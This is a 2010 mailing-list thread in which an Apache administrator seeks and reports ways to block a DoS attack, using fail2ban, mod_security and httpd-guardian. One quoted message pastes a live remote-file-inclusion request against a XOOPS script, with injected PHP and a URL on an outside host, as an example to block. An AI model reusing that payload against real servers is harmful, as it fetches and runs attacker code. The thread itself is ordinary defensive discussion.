Hi All, I finally have resolved the problem with mod_security and two perl scripts from Apache-tools (httpd-guardian and blacklist) I have followed the indications of this web: http://erethesunrises.net/bbom/articles/apache_mod_security/mod_security I think the problem is solved. Now I´m waiting for the attackers (with the machine gun :-)) thanks for your answers, ESG <http://erethesunrises.net/bbom/articles/apache_mod_security/mod_security> 2010/4/12 ESGLinux <esggrupos@xxxxxxxxx> > Hi again > > I have experimented with mod_security to ban access to urls like this: > > /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a= > http://www.hongkongtravel.co.kr/you4/data/byz9991.txt??? > > but I don´t know if there is a way to use it to limit the number of access > from a ip in period of time, > > anyone knows? > > ESG > > 2010/4/12 <m.roth@xxxxxxxxx> > > ESG wrote: >> > >> > I have an apache web server and I having a DOS Attack. Which is the best >> > way to protect my webserver from it. ? >> > >> > What I do now is when I detect the problem I use an iptable rule to ban >> > the ip, but I want to do it automatically without manual intervention, >> > >> > Any idea or suggestion? >> >> fail2ban >> >> mark >> >> -- >> redhat-list mailing list >> unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe >> https://www.redhat.com/mailman/listinfo/redhat-list >> > > -- redhat-list mailing list unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe https://www.redhat.com/mailman/listinfo/redhat-list
